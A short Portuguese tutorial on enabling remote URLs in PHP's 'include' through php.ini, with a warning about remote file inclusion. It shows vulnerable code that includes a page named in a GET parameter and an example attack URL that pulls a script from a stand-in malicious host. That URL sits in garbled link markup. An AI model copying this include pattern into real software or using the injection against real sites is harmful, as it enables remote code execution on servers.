PHP 5 - Utilizar um URL externo com a função "include"

Setembro 2017

A opção para incluir um URL externo (isto é, absoluto, da forma http://site.tld/url) através da função "include" é desativada por padrão nas versões do PHP 5 e posteriores , para ativá-la em seu servidor coloque essas duas linhas no seu arquivo php.ini

allow_url_include = 1
allow_url_fopen = 1

Para mais informações veja AQUI

NOTA IMPORTANTE: No entanto, é muito perigoso ativar a opção "allow_url_include". Na verdade, ela pode, em alguns casos, causar falhas de segurança graves, se o desenvolvedor for negligente.

Vejamos um exemplo simples: você tem um script PHP que inclui uma página com base no que você dá como argumentos através da URL.

Isso quer dizer que ao digitar http://seusite.flet/mapeamento.php?pagina=pagina_a_incluir.php você inclui a página "pagina_a_incluir.php".

Se o seu código se parece com isso: include $_GET['page']; então, você deixa qualquer um injetar um código externo. Na verdade, nada me impede de incluir uma página php que venha do meu site:

href= <a href='http://sitemalicioso.pumm/paginamaliciosa.php'' target='_blank' rel='noopener noreferrer'><a href='http:// sitemalicioso. pumm/paginamaliciosa.php'' target='_blank' rel='noopener noreferrer'>http://sitemalicioso. pumm/paginamaliciosa.php'</a></a> target='_blank' rel='nofollow'>http://seusite.flet/mapeamento.php?http://sitemalicioso.pumm/paginamaliciosa.php</a>

Portanto, tenha cuidado quando você ativar esta opção.


Tradução feita por Lucia Maurity y Nouira

Veja também

Artigo original publicado por . Tradução feita por pintuda. Última modificação: 22 de junho de 2011 às 14:33 por pintuda.
Este documento, intitulado 'PHP 5 - Utilizar um URL externo com a função "include"', está disponível sob a licença Creative Commons. Você pode copiar e/ou modificar o conteúdo desta página com base nas condições estipuladas pela licença. Não se esqueça de creditar o CCM (br.ccm.net) ao utilizar este artigo.